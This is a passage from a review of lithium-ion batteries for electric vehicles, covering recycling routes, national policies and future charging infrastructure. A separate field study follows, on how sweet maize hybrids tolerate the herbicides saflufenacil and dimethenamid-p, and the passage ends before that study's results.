Recycling is another approach to satisfying the carbon neutrality criteria and easing anxiety over finite resources. Recycling can potentially lower the overall energy consumption and emissions of virgin battery production as the LIB recycling industry grows larger and becomes more mature. [77] For instance, the production of transition metals is largely from sulfide ores. This process produces SO x emissions that cause damage to the environment, such as acid rain and soil contamination. Effective recycling of transition metals can substantially reduce the emissions during raw mineral processing. Dunn et al. reported that LIB recycling can effectively reduce GHG and SO x emissions especially for Ni and Co-containing cathodes based on the LCA. [8h] Therefore, recycling can significantly foster the establishment of a sustainable LIB industry. However, the LIB recycling industry still faces numerous practical hurdles at present, such as the technical limitations of different recycling routes.
Generally, there are three major LIB recycling routes, which are schematically shown in Figure 4. The direct recycling route (denoted by the blue arrows) involves the least processing among the three routes. Initially, the electrolyte is extracted from the spent LIB using supercritical carbon dioxide. The retrieved electrolyte can be recycled after further processing. The remaining components will be separated based on their properties through a series of physical processes. The recovered cathode material can be reintroduced to the battery assembly lines. Re-lithiation or additional processing of the recovered cathode is normally needed to compensate for the performance loss. [78] Direct recycling can recover nearly all battery materials and requires less treatment than other routes. However, the performance of recovered materials may be compromised. [57] Hydrometallurgical recycling involves leaching, which recovers the metal species from aqueous media (denoted by the orange arrows). Spent LIBs are pretreated with several physical processes, such as shredding and screening, to obtain black mass and Cu and Al foils. The black mass is leached to obtain the solution containing metal cations. After solvent extraction, the dissolved salts can be separated and recovered, and then reintroduced into the supply chain for cathode synthesis and battery manufacturing. [77] Hydrometallurgical recycling is efficient to isolate the component of interest in the aqueous environment, and the obtained product is pure. The procedures are relatively energy-efficient and environmentally friendly because they do not involve high-temperature processing. However, the treatment of tremendous effluents elevates the cost.
The third route requires additional energy-intensive smelting steps. Pyrometallurgical recycling recovers different metals through oxidation or reduction reactions at high temperatures. As indicated by the green arrows, the spent LIB can be dismantled and shredded first to generate the black mass, or it can be fed directly to the furnace to obtain the mixed metal alloy (e.g., Ni, Co). The latter approach is generally preferred because separating the black mass from Al and Cu foils adds additional cost, and the Al can be utilized as a reductant in the furnace to save the smelting energy. [77] The mixture of Al and Li oxides remains in the slag if adopting the latter approach, which is normally not recovered due to economical inefficiency. Next, the obtained metal alloy undergoes leaching and solvent Figure 4. Three LIB recycling routes as indicated by the blue, orange, and green arrows. Physical processing (mechanical separation and dissolution) is usually adopted as a pretreatment for all recycling routes. Depending on the materials that need to be recovered, one can choose specific recycling routes to achieve higher recycling efficiency at a lower cost. For example, hydrometallurgical and pyrometallurgical recycling are economical for high Ni and Co cathodes but not appropriate for cathodes containing fewer precious metals such as LFP and LMO. [77,78] www.advancedsciencenews.com extraction processes (hydrometallurgical recycling) for cathode resynthesis and battery assembly. Pyrometallurgical recycling needs little mechanical pretreatment and can efficiently recover metals. However, it results in substantial energy consumption, emissions, and transportation expense. The choice of recycling routes may vary with different types of spent LIBs and the material of interest to recycle. For example, LIB recycling mainly focused on recovering Co initially due to its high value. Subsequently, recycling at the cathode level may offer higher revenue than recycling particular metal constitutes as the Co content becomes lower and other cell components are in higher demand. Direct recycling may offer additional benefits in this regard, although maintaining the performance of recycled materials to the level of virgin materials remains challenging. [77] Overall, the technical obstacles need to be addressed to make recycling more economically attractive.
For these aforementioned traditional recycling approaches, preprocessing steps such as discharging and pulverization are normally required. The spent LIBs entering the recycling line are mostly at partially charged states. The lithiated graphite anode is highly reactive in air, which can readily lead to aggressive thermal release and safety concerns. Therefore, discharging the spent LIBs first is critical yet tedious. The discharging process is time-consuming and requires large spaces to prevent cell contact. The salt solution used for degassing during discharging raises additional costs. After discharged, the spent LIBs can be safely pulverized into mixed powder. As discussed, hydrometallurgical and pyrometallurgical recycling require extensive heat and chemical treatments to separate and recover the desired metals. However, impurities, such as Cu, Al, Fe, and organic compounds, are still inevitably present in final recycled products even for direct recycling that needs the least processing. [79] Zhang et al. and Peng et al. investigated the effect of Cu impurity in recycled NMC and LCO batteries. [79a,b] Metallic Cu, especially from physical separation with direct recycling approach, can easily cause shortcircuiting. [79a] Low content of Cu ion impurity can benefit the recovered cathodes regarding the capacity and capacity retention, while excess Cu ion introduces impurity phase to the cathode and deteriorates the performance. [79a,79b] Similar beneficial effects at low content and detrimental effects at high content for Al and Fe have also been reported. [79c,d] However, the actual impurity content in industrial recycling processes can be more random. It is critical to monitor and control the impurity level for the quality of recycled materials. Related regulations on the standard of impurities in recycled electrodes are recommended.
In addition to the three traditional recycling routes, more novel approaches have been demonstrated at the research level to address the energy-intensive, high cost, and heavy waste issues. Zhao et al. reported a precise separation method that could simply separate jellyroll cell components in water. [80] The pretreatment of discharging is avoided without compromising safety because water can isolate oxygen and immediately extinguish the potential fire during disassembly. LiC x in the graphite anode can react with water, accompanied by heat and bubble generation, which can facilitate the dissolution of binder and peeling-off of anode materials from the current collector. This method achieved higher recycling efficiency, simpler processing, and higher revenue at the lab research scale than traditional recycling approaches. Wang et al. added ammonium sulfate during recycling to reduce the decomposition temperature of LCO to below 400 °C, which lowered the energy consumption and enhanced the recycling efficiency. [81] These novel recycling methods showed appealing results at the research scale, but more technical challenges and economic efficiency should be addressed as applied to the industrial-scale recycling.
Recycling can relieve the pressure on the primary production of essential metals (e.g., Co and Ni) in the long term, but there could be a concern of short-term shortage affecting Ni-based cathodes, as discussed in the last section. A consensus nevertheless is that recycling will play an indispensable role at least in the long term. IEA estimated that the spent EV batteries will surge after 2030. [4] Therefore, boosting the primary production is still the most feasible way to address the short-term Co or Ni supply risk. The World Bank reported that even the end of life recycling rate of Co could reach 100%, there is still a large demand for primary Co production. [82] An additional concern is the long lead time for mining projects, which is estimated to be around 16 years on average from discovery to production. [4] Such long duration may not satisfy the ramping demand in the short term. Therefore, we suggest that more incentive policies should be established to simplify and accelerate the mining process and encourage the mining companies and investors to develop new mining projects. Meanwhile, governments should provide stronger support to the LIB recycling industry, because the profitability is relatively low at the early stage when recycling is at a small scale and primary production can still digest the demand. For the countries not possessing a robust domestic supply chain, recycling can supplement the supply of primary battery components. [57] Supportive policies are also critical to tackle practical hurdles faced by the LIB recycling industry. For instance, LIB manufacturing was not systematically regulated initially for the convenience of recycling. Therefore, identifying and classifying various cell components and electrode materials raises recycling expenses. In the US, spent LIBs are classified as hazardous waste, and the cost of transporting spent LIBs accounts for more than half of the total recycling expenses. [63] Corresponding policy support can give rise to more monetary incentives for manufacturers to resolve these challenges. For example, standardizing the cell design and labeling the materials can reduce the pretreatment cost during recycling. Labeling battery chemistries in a standard way and classifying different batteries during recycling would also allow the highest environmental benefits of battery recycling based on the LCA. Ma et al. have discussed several challenges faced by the LIB recycling community. [83] In addition to the technical obstacles of the three aforementioned recycling approaches, the evolving battery design (e.g., Tesla's 4680 cylindrical cells and "tabless" design, BYD's blade battery pack, and CATL's cell-to-pack technology) brings more difficulties to disassembly and pretreatment. [83] It is expected that there will be nearly 2 million metric tons of global spent LIBs per year by 2030, pushing recycling to a large scale. [83] However, the profit of large-scale recycling is limited because of the lack of regulation support, nonstandardization issues, high cost of transportation, and storage of spent batteries at the large www.advenergymat.de www.advancedsciencenews.com scale. [83] The trend of Co-free materials further diminishes the economic benefit of recycling. Convincing battery manufacturers to adopt recycled materials is also challenging because the performance of recycled materials needs to match or exceed the virgin ones. [83] Therefore, more collaborations between the industry, universities, and laboratories are needed to meet the practical industrial requirements. [83] Government incentives and policies can attract more researchers, manufacturers, and investors, enabling recycling technologies to progress and total costs to be reduced.
Policies and Legislation
Government policies and legislation often regulate and guide the LIB materials development, supply chain, manufacturing, and recycling. Investigating the regulations in various countries is crucial to comprehend the global LIB industry. Several countries and regions have declared their targets for addressing environmental issues and the global climate change. Specifically, the US, Canada, and EU plan to achieve net-zero emissions by 2050, and China aims for carbon neutrality by 2060 ( Table 2). Carbon neutrality by 2060. [90] 1) Carbon neutrality by 2050 and at least 55% emissions reduction by 2030. [91] 2) CO 2 emissions standards (in terms of g CO 2 km −1 ) for cars tighten by 37.5% and for vans by 31% between 2021 and 2030. [92] Achieving carbon-pollution-free electricity by 2035, and achieving net-zero emissions, economy-wide, by 2050. [93] Net-zero emissions by 2050. [94] EVs market 1) NEVs sales reaching 20% of vehicle sales by 2025, NEVs become the mainstream of new vehicles sales by 2035; [1a] 2) Target for manufacturers: annual NEV credit as a percentage of their annual vehicle sales (14% in 2021, 16% in 2022, 18% in 2023). [95] At Charging infrastructure 1) Building more than 120 000 charging stations and more than 4.8 million charging outlets by 2020. [98] 2) The 13th 5 year plan included RMB 90 million in funding for installation of charging infrastructure. [99] 3) Over 30 cities offer subsidies for home or public EV charging. [99] Target of 1 million publicly accessible chargers installed by 2025. [100] 1) Building a national network of 500 000 EV chargers by 2030. [101] 2) Invest $7.5 billion to build a national network of EV chargers. [102] Invest an additional $150 million over 3 years in charging and refueling stations across Canada, as announced in 2020. [103] Manufacture 1) Restricting subsidies to only larger battery production facilities (at least 8 GWh production capacity); 2) Tax exemptions for battery producers; 3) Restricting electric vehicle incentives to vehicles with batteries manufactured in China to attract foreign investment. [85] The European Investment Bank supported the construction of an LG Chem Li-ion battery cell-to-pack manufacturing Gigafactory in Poland in early 2020 (EUR 480 million). [86a] Near-term objective (2025): 1) Develop federal policies to support the establishment of resilient domestic and global sources and supplies of key raw materials; 2) Decrease cost to enable a $60 kWh −1 cell cost. Long term objective (2030): 1) Eliminate Co and Ni in LIB; 2) Reduce the cost of EV pack manufacturing by 50%. [63] 1) Investing CAD 590 million to the Ford Motor Company Canada to support EVs production. [86b] 2) The federal and Québec governments are providing CAD 100 million to Lion Electric to support a battery pack assembly plant project. [104] Recycling Encourage the standardization of battery design, production, and verification, as well as repairing and repackaging for second life utilization. [87] 1) From 1 July 2024, only rechargeable industrial and EV batteries established a carbon footprint declaration, can be placed on the market; 2) Increasing transparency of the battery market and the traceability of large batteries throughout their life cycle by using new IT technologies, such as Battery Passport. [88] Near-term objective (2025): 1) Foster the design of battery packs for ease of second use and recycling; 2) Increase recovery rates of key materials such as cobalt, lithium, nickel, and graphite. Long term objective (2030): Create incentives for achieving 90% recycling of consumer electronics, EV, and grid-storage batteries. [63] Lithion Recycling Inc. received $3.8 million, and Li-Cycle Corp. received $2.7 million for LIB recycling. [89] www.advenergymat.de www.advancedsciencenews.com Automotive electrification will play a key role in such decarbonization process. Many countries and regions have announced policies for EV development, infrastructure construction, and LIB recycling in response to the growing competition in the EV market. Herein, we select several active players in the worldwide race of EVs and LIBs. We demonstrate how their policies can impact the EV and LIB development on a national or global scale.
Present global EV sales are primarily contributed by Europe, China, and the US. [3,72] These major contributors have established targets for EV sales to further stimulate their EV developments ( Table 2). The EU announced the goal that nearly all cars, vans, buses, and new heavy-duty vehicles will achieve zeroemission by 2050. [1b] China targets to have 20% of new vehicle sales from new energy vehicles (NEVs) by 2025. [1a] Furthermore, BEVs are expected to become the mainstream of new vehicles sold in China by 2035. [1a] The policies for EV sales in the US are primarily at the state level. 16 states and regions expected zeroemission vehicle (ZEV) sales to constitute 30% of all new midduty vehicles (MDVs) and heavy-duty vehicle (HDVs) sales by 2030 and 100% by 2050. [1c] In Canada, ZEV sales are expected to account for 10%, 30%, and 100% of LDV sales by 2025, 2030, and 2040, respectively. [1d] More countries in Asia, Europe, and North America have been actively deploying the EV industry, and the specific policies can be referred to ref. [84]. Charging infrastructures need to be developed accordingly to accommodate the rapid growth of EVs. Wide implementation of charging infrastructures can enhance the confidence of EV consumers and stimulate EV manufacturers. Therefore, charging infrastructures determine the potential market of EVs. The countries leading EV sales also invest heavily in charging infrastructures (Table 2). Furthermore, geologic and climate factors need to be addressed upon EV deployment because the performance of automotive batteries is susceptible to the environment, such as temperature. In summary, several top economies in the world have shown their determination in the development of EVs and established aggressive targets. Such positive signals can potentially spread confidence to the LIB community.
LIB is one of the most critical components in EVs. The global LIB production capacity and distribution have evolved over time, largely due to the policies of different countries and regions. At present, LIB manufacturers mainly distribute in Asia, North America, and Europe ( Figure 3). Many countries have worked to establish a resilient domestic supply chain and manufacturing to gain some advantages in the global competition of EVs and LIBs. The Chinese government announced tax exemptions for battery producers to promote domestic manufacturing. [85] The US, Canada, and many European countries have also provided strong finical support to domestic battery manufacturers. [63,86] At the materials level, there is a general trend toward Ni-and Co-free cathodes. The US DOE announced the goal to reduce the dependence on Ni and Co and expected to eliminate Ni and Co in LIBs by 2030. [63] More automotive companies have been exploring Ni/Co-free cathodes. [31] The two types of cathodes will coexist for various purposes. However, Ni and Co battery chemistries could potentially be supplemented or substituted by more sustainable alternatives. Importantly, it is becoming more challenging for emerging materials to be cost-competitive considering the extensive investments that have already been committed. [30] Therefore, legislation support might be required to prevent the "lock-in" of incumbent materials when developing new materials. In general, many countries are attempting to develop domestic manufacturing in a more sustainable manner.
Recovering the scarce metals through recycling is another path to building a sustainable LIB industry. Unstandardized battery labeling, as discussed, results in tremendous additional efforts during recycling. Regulations at the country level can significantly enhance the efficiency of battery recycling. The Chinese government issued the Interim Measures requiring battery manufacturers to keep their products standardized. [87] The Measures recommend cooperation between battery manufacturers and new energy vehicle manufacturers for easy tracking of battery life cycles. [87] The European Commission proposed to increase the transparency and traceability of batteries throughout the entire cycle life by using new IT technologies, such as Battery Passport. [88] The relatively immature technology, and limited investment and profit are several other challenges of the LIB recycling. Financial and strategic support from governments can help attract more investments, which will stimulate the scaling up of the LIB recycling industry and technology improvement. The European Commission proposed mandatory requirements for batteries on the EU market, such as including a minimum amount of recycled components in new batteries. [88] Canada supports the development of recycling by funding several LIB recycling companies. [89] The US intends to establish federal policies to promote LIB recycling, and targets to recycle 90% of batteries in consumer electronics, EVs, and grid storage by 2030. [63] To summarize, governments across the world are enacting more supportive policies for the LIB recycling industry.
Perspectives
In summary, we have reviewed the status of EV batteries from the perspectives of environmental impact, electrode materials, supply chain, manufacturing, recycling, and governmental policies. Generally, the GHG emissions of EVs are lower than that of ICEVs due to high powertrain efficiency and zero tailpipe emissions, although producing an EV could generate more emissions than producing an ICEV because of the manufacturing of batteries and electric powertrain system. Electricity generation sources also largely determine the final emissions of EVs. Promoting the use of renewable energy to generate electricity is vital to maximizing the environmental benefits of EVs.
At the materials level, enhancing Ni content is the general trend of Ni-based cathodes, but Ni-free and Co-free cathodes have regained attention in recent years, especially LFP. Ni and Co are more vulnerable to supply chain disruption than Fe because they are more valuable and unevenly distributed. From the perspective of most EV consumers, high energy density is not critically necessary anymore if it can satisfy their daily commuting needs. Besides, high energy density is in less demand due to the fast charging capability of LFP and the expansion of the charging station network. Therefore, the advantages of low cost and safety of LFP stand out. However, Ni-based NMC or NCA materials still undergo rapid development and constitute a large portion of the EV battery market. To narrow the energy density gap between the Ni-and Co-free cathodes and Ni-based cathodes, we have provided several directions: 1) enhance the cell-level energy density by developing high-energy anode materials, such as Li metal and Si anodes; 2) optimize the form factor of the individual cell and battery pack design; 3) construct fast charging facilities and develop novel charging methods (e.g., wireless charging in Figure 5); 4) develop battery pack swapping methods for suitable EV types, such as public transportation. In addition, Li excess cathodes, such as LLOs and DRX, show high capacity at the research level without extensively relying on Ni or Co. However, the fast capacity decay, limited Li kinetics, and oxygen loss issues bring practical concerns on performance and safety, hindering their commercialization. We believe that the demand for both Ni-based cathodes and Ni-and Co-free cathodes will exist for specific applications. Sustainable cathode chemistry will be imperative as supply chain issues emerge.
A volatile supply chain could offset the performance benefit promoted by electrode materials. The distribution of the essential minerals for producing LIBs is scattered globally. No single country possesses all the essential raw materials for battery manufacturing. However, the global distribution of each specific metal is relatively concentrated. For example, DRC possesses 69.0-70.4% of global Co mining, and Australia shares 48.7-52.0% of global Li mining. Such uneven distribution of essential raw minerals may easily induce LIB supply chain disruption or price volatility due to potential geopolitical conflict or global challenges. Regarding the current mineral processing and battery manufacturing capacity, Asia countries, especially China, have been playing the dominant role globally. Developing technology and enhancing the efficiency of manufacturing are also significant besides production capacity. Public and private R&D has been the major driving force for the LIB cost reduction in the past. The US has a solid foundation for battery research and technology. The government continues to provide strategic and financial support for fundamental research. We believe the support for diversified fundamental battery research and lab-to-market development is of great importance to the evolution of next-generation EV batteries. Consumers and existing battery products are less impacted by the LIB supply chain disruption than by fossil fuel shortages, but the stability of the supply chain is necessary for the longterm sustainable development of LIBs. A closer collaboration across the world and associated legislation are recommended to achieve a sustainable supply chain.
Strengthening the supply chain ensures stable primary battery production. Meanwhile, battery recycling becomes indispensable as mineral resources become limited and massive spent LIBs are generated. A common consensus is that recycling can relieve the shortage of raw materials in the long term. However, it is also forecasted that there could be a short-term deficit of several essential metals, such as Co and Ni, in the decade to come as discussed earlier. Therefore, we suggest that more incentive policies on both primary mineral production and recycling should be implemented. Largescale recycling facilities and high throughput can effectively enhance the energy utilization efficiency and potentially lower the overall energy consumption of primary battery manufacturing. However, the environmental impact may vary with different recycling routes and battery chemistry. For example, recycling LFP even results in a net increase of GHG emissions compared to not recycling, no matter with which of the three major recycling routes. [8i] In addition, the traditional recycling methods could generate impurities and affect the performance of recycled products. Therefore, it is critical to monitor the impurity level and establish standards. More investigations on developing novel recycling approaches are expected to address energy-intensive and environmental issues of current methods. Besides, the unstandardized spent batteries from different battery manufacturers lead to extensive inefficient labor in pretreatment, such as sorting. Therefore, we suggest that regulations should be established to standardize the primary battery production.
Government policies and regulations are imperative not only for the recycling industry, but also for guiding the direction of LIB development. Several top economies in the world have shown their determination to secure domestic supply chains and develop local battery manufacturing. They have established aggressive targets of partial or full automotive electrification in the next couple of decades to meet carbon neutrality. At the cathode chemistry level, the US DOE set targets to eliminate Ni and Co in LIBs by 2030. We also want to highlight the significance of government regulations in preventing the "lock-in" of incumbent materials during the development of new materials.
LIBs have reshaped the way we transport and connect with each other since the first commercialization. In the past decade, LIBs have played a significant role in the revolution of smartphones. In recent years, LIBs have demonstrated remarkable success in EVs for a greener automotive industry. In the next few decades, LIBs will not only experience expeditious growth but also promote the construction of associated infrastructures. LIBs will shape the world into a more interconnected and smarter place with the rise of the 5G networks. Herein, we envision the potential development of energy storage technologies and EV charging infrastructures in the future ( Figure 5). In the short-term scenario that requires relatively less technology advancement, EVs running out of electricity can be charged via peer-to-peer car charging (P2C2) by other vehicles (Figure 5a). The P2C2 requires low-battery EVs to be plugged into fullbattery vehicles. [105] Low-battery EVs can also be charged during driving by the mobile charging stations, which are portable and temporarily installed in the EVs. [105] However, the weight of the portable charging stations may potentially lead to a low efficiency in vehicle mobility. Service vehicles will be on duty to provide P2C2 services or mobile charging stations. These charging methods are potentially not appropriate for routine charging but can offer rescue to EVs in an emergency. In the regions that receive sufficient sunshine, solar panel charging can be integrated on EVs to provide auxiliary support to the battery system. Sono Motors has announced their solar cell integrated EV Sion, which utilizes solar power. [106] Regarding the infrastructure, more charging stations can be constructed along the highways. More entertainment facilities will accompany the charging stations, such as restaurants and shopping malls, which can serve the people waiting for charging and boost the local economy. To summarize, we proposed several approaches to modifying the current EV charging methods based on relatively mature technologies. In addition, we conceived the longterm scenario that involves relatively significant adjustments to the current charging methods and infrastructures.
In the long-term scenario, both EVs and infrastructures will experience more technical breakthroughs, and there will be more interactions between them. Smart roads can be constructed to combine wireless charging with various functions, such as ice melting in winter and traffic condition monitoring (Figure 5b). EVs can be charged on the roads during driving, which will alleviate the anxiety of mileage. In addition, energy harvesting technologies, such as piezoelectric systems, can be integrated into smart roads to generate electricity based on the stress and motion of vehicles, which can enhance the energy utilization efficiency. [107] Several projects of smart roads integrated with wireless charging have been demonstrated in Europe and the US by Electreon Wireless Ltd and Integrated Roadways. [108] This approach might open the door to a broader range of automotive batteries with lower energy density but superior economic and environmental benefits. During the transition period, the roads can be partially reconstructed to accommodate one or two wireless charging lanes based on established infrastructures. Vehicle-to-everything (V2X) communication will be strengthened significantly thanks to the high-speed 5G network that is undergoing rapid development. [69] V2X can create an information network by exchanging data between vehicles and traffic systems. As a result, a smarter, safer, and more efficient traffic ecosystem will become a reality, including more mature autonomous driving, collision avoidance, and traffic jam forecast and reduction. The breakthrough on electricity generation is also expected for the greener long-term scenario. Electricity generation using fossil fuels is still a significant source of carbon emissions today. More renewable energy sources, such as wind and solar energy, will be applied in suitable regions for future electricity generation. Electricity distribution stations can be constructed accordingly along with the charging infrastructures to achieve more flexible and convenient charging. In all, we anticipate that EVs will be more interconnected to other facilities in the long-term scenario. The innovation of charging methods will also provide more room for battery materials development.
It is the worst of times when resources on the earth are becoming more limited, and the human society is facing energy crises and environmental degradation. It is the best of times when people are actively seeking strategies to address energy and environmental challenges with advanced and sustainable energy storage technologies. LIBs have changed and will continue to change the lifestyle of people and the ecosystem in the twenty-first century. In the upcoming decades, LIBs at the materials level will gradually shift to more sustainable chemistries. With extensive financial and strategic support from governments around the world, the LIB manufacturing and associated infrastructure construction will undergo a rapid growth. Climate issues can be alleviated by substituting ICEVs with EVs. Recycling will occupy a larger portion of the market and in turn enhance the economic and environmental efficiency of the battery production. The healthy growth of the LIB industry can never be solely accomplished by one specific field. We believe that building the synergies between different fields surrounding the LIB industry will greatly promote the development of LIBs for a more sustainable society. This Perspective aims to inspire more interdisciplinary discussion and investigations on the advancement of LIBs.
Supporting Information
Supporting Information is available from the Wiley Online Library or from the author.
Haibo Huang is an associate professor in Food Science and Technology Department at Virginia Tech. His research interests are the conversion of biomass into food ingredients, biochemicals, and functional biomaterials as well as techno-economic analysis and life cycle analysis of bioprocesses and renewable technologies. He holds a B.Sc. in Biosystems Engineering (Zhejiang University), an M.Sc. in Biological Engineering (University of Arkansas), and a Ph.D. in Agricultural and Biological Engineering (University of Illinois at Urbana Champaign).
Feng Lin is an associate professor of Chemistry at Virginia Tech. He holds a Bachelor's degree in Materials Science and Engineering from Tianjin University and a Ph.D. degree in Materials Science from Colorado School of Mines. Previously, he worked at QuantumScape, Lawrence Berkeley National Laboratory, and National Renewable Energy Laboratory. His research interests include energy storage, catalysis, and smart windows. | 2022-05-12T15:19:13.395Z | 2022-05-10T00:00:00.000 | {
"year": 2022,
"sha1": "439976322ffb197d5c3d8d2f1d843f12f84f5557",
"oa_license": "CCBYNC",
"oa_url": "https://onlinelibrary.wiley.com/doi/pdfdirect/10.1002/aenm.202200383",
"oa_status": "HYBRID",
"pdf_src": "Wiley",
"pdf_hash": "65ab2d9c85c72769cab44002dca53e709d3c5ea5",
"s2fieldsofstudy": [
"Environmental Science",
"Engineering"
],
"extfieldsofstudy": []
} |
55726022 | pes2o/s2orc | v3-fos-license | Response of Eight Sweet Maize (Zea mays L.) Hybrids to Saflufenacil Alone or Pre-Mixed with Dimethenamid-P
Saflufenacil is a new herbicide for use in field maize (Zea mays L.) and other crops that may have potential for weed management in sweet maize. Tolerance of eight sweet maize hybrids to saflufenacil and saflufenacil plus dimethenamid-p applied preemergence (PRE) were studied at two Ontario locations in 2008 and 2009. Saflufenacil applied PRE at 75 and 150 g·ha and saflufenacil plus dimethenamid-p (pre-mixed) applied PRE at 735 and 1470 g·ha caused minimal (less than 5%) injury in Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 sweet maize hybrids at 1 and 2 weeks after emergence (WAE). Saflufenacil or saflufenacil plus dimethenamid-p applied PRE did not reduce plant height, cob size, or yield of any of the sweet maize hybrids tested in this study. Based on these results, saflufenacil and saflufenacil plus dimethenamid-p pre-mixed applied PRE at the doses evaluated can be safely used for weed management in Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 sweet maize under Ontario environmental conditions.
Introduction
Sweet maize (Zea mays L.) is one of the most important field grown vegetables in Ontario [1].In 2009, nearly 112,000 tonnes of sweet maize was produced on approximately 9000 hectares with a farm-gate value of $36 million, and ranked as the second largest field grown vegetable crop in Ontario in terms of farm-gate value [1].Weed control is critical in sweet maize production to maintain quality and yield and be competitive in the global market place.More research is needed to identify herbicide options that can effectively control grass and broadleaved weeds in sweet maize production.
Saflufenacil is a pyrimidinedione that inhibits protoporphyrinogen-IX-oxidase (PPO).Susceptible weeds to saflufenacil show injury symptoms within a few hours and die in 1 to 3 days [6].Saflufenacil has both contact and residual activity against susceptible weeds and is mainly translocated in the xylem [6].Saflufenacil is applied at relatively low doses and has low environmental, toxicological and eco-toxicological impact with minimal residual carryover and persistence in the soil [6].The proposed dosage for sweet maize in Ontario is 75 g a.i.ha -1 .Saflufenacil provides a novel mode of action (PPO inhibitor) for sweet maize that is different than currently used broadleaved herbicides reducing potential for the selection of herbicide resistant weed biotypes [6,7].
Saflufenacil is also compatible with residual herbicides that control grasses.BASF has developed saflufenacil plus dimethenamid-p premix (BAS781) for use in maize and other crops [6].Dimethenamid-p is a chloroacetamide herbicide that in susceptible plants inhibits very long chain fatty acid synthesis [7].Dimethenamid-p can provide season long control of a broad spectrum of grass and broadleaved weeds such as barnyardgrass (Echinochloa crusgalli), autumn panicum (Panicum dichotomiflorum), giant foxtail (Setaria faberi), green foxtail (Setaria viridis), yellow foxtail (Setaria glauca), large crabgrass (Digitaria sanguinalis), smooth crabgrass (Digitaria ischaemum), witchgrass (Panicum capillare), redroot pigweed (Amaranthus retroflexus), American black nightshade (Solanum americanum), and eastern black nightshade (Solanum ptycanthum) [2,7].Dimethenamid-p at the registered application doses has been shown to cause little or no injury in field maize [8,9].Saflufenacil plus dimethenamid-p can provide an effective broad spectrum herbicide option for the control of troublesome species in sweet maize.
Saflufenacil and saflufenacil plus dimethenamid-p are desirable compliments to the current weed management programs in sweet maize because of its low dosage; broad-spectrum weed control, environmental safety, and new mode of action that will help reduce selection for herbicide resistant biotypes.There is no published information on the sensitivity of sweet maize hybrids to the PRE application of saflufenacil or saflufenacil plus dimethenamid-p.If tolerance is adequate, registration of saflufenacil and saflufenacil plus dimethenamid-p will provide sweet maize growers with an additional option for annual weed control.Sensitivity of sweet maize to herbicides is dependent on the application dose, hybrid, and environmental conditions.Sweet maize hybrid sensitivity has been documented for foramsulfuron [10], bentazon [11], prosulfuron [12], mesotrione [13], nicosulfuron [14,15], primisulfuron [16], isoxaflutole [17], and thifensulfuron-methyl [18].
The objective of this study was to determine the sensitivity of Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 sweet maize to saflufenacil and saflufenacil plus dimethenamid-p applied PRE under Ontario environmental conditions.
Materials and Methods
Field experiments were conducted at the University of Guelph, Ridgetown Campus, Ridgetown, Ontario and the Huron Research Station, Exeter, Ontario in 2008 and 2009.The soil at the Ridgetown location was a Watford/ Brady loam composed of 51% sand, 32% silt, 16% clay, and 5.5% organic matter with a pH of 7.2 in 2008 and 49% sand, 34% silt, 17% clay, and 9.2% organic matter with a pH of 7.2 in 2009.The soil at the Exeter location was a Brookston clay loam composed of 34% sand, 36% silt, 30% clay, and 3.6% organic matter with a pH of 8.0 in 2008 and 39% sand, 37% silt, 24% clay, and 4.3% organic matter with a pH of 7.9 in 2009.Seedbed preparation consisted of moldboard plowing in the fall and cultivation in the spring.Fertilizer was broadcast and incorporated prior to seeding based on soil tests and local recommendations.
There were two experiments established side by side at each site (one evaluating saflufenacil and the other evalu-ating saflufenacil plus dimethenamid-p).The experiments were arranged in a split-plot design with four replications.The main plots were herbicide dose, and the subplots were sweet maize hybrids.Selection of herbicide doses was based on the manufacturer recommended use dose and twice the manufacturer recommended dosage.
Treatments consisted of a non-treated check and two doses of saflufenacil (0, 75 and 150 g a.i.ha -1 ) or saflufenacil plus dimethenamid-p (0, 735 and 1470 g a.i.ha -1 ) representing the untreated control and the 1X and 2X of the proposed label dose, respectively.Eight of the most commonly grown processing sweet maize hybrids in southwestern Ontario encompassing a range of endosperm genotypes were selected: Cahill (su), GH4927 (su), Harvest Gold (su), Rocker (su), BSS5362 (sh 2 ), GG236 (su), GG447 (su), and GG763 (su) sweet maize.Each of the main plots was 6 m wide by 8 m long at Ridgetown and 6 m wide by 10 m long at Exeter.The subplots each consisted of a single row of each sweet maize hybrid with rows spaced 75 cm apart.The sweet maize was thinned to 50,000 plants ha -1 shortly after emergence.The plots were then kept weed-free using inter-row cultivation and hand hoeing as required.
Herbicide treatments were applied PRE four to eight days after planting using a CO 2 -pressurized backpack sprayer calibrated to deliver 200 L aqueous solution at 241 kPa.The boom was 1.5 m wide with four ULD120-02 nozzles (ULD120-02 nozzles tip; Spraying Systems Co., Wheaton, IL.) spaced 0.5 m apart.
Crop injury including stand reduction was evaluated visually comparing the non-treated hybrid to the respective treated hybrids on a scale of 0 to 100% at 1 and 2 weeks after emergence (WAE).A rating of 0% was defined as no visible effect of the herbicide and 100% was defined as plant death.Average maize height (based on ten random plants per subplot) was measured for each subplot 3 WAE.The height of the plant was defined as the maximum height from the soil surface with the leaves fully extended.At maturity, each subplot was harvested by hand and cob size, marketable yield (a cob greater than 5 cm in diameter) and total yield were recorded.Because the results of the statistical analyses for total and marketable yields were similar, only marketable yield is reported.
All data were subjected to analysis of variance (ANO-VA).Tests were combined over locations and years and analyzed using the PROC MIXED procedure of SAS (Statistical Analysis Systems Institute, Cary, NC, USA).Variances of percent crop injury at 1 and 2 WAE, plant height, cob size, and yield were partitioned into the fixed effects of herbicide treatment, hybrid, and herbicidehybrid interaction and into the random effects of siteyear, block (site-yr), site year-treatment, site year-hybrid and site year-hybrid-treatment.Significance of random effects was tested using a Z-test of the variance estimate and fixed effects were tested using F-tests.Error assumptions of the variance analyses (random, homogeneous, normal distribution of error) were confirmed using residual plots and the Shapiro-Wilk normality test.To meet the assumptions of the variance analysis, visual injury at 1 and 2 WAE were subjected to an arcsine square root transformation and cob size data were log transformed.No transformation was required for plant height or yield.Treatment means were separated using Fisher's protected LSD test.Means of percent injury and cob size were compared on the transformed scale and were converted back to the original scale for presentation of results.Type I error was set at P ≤ 0.05 for all statistical comparisons.
Results and Discussion
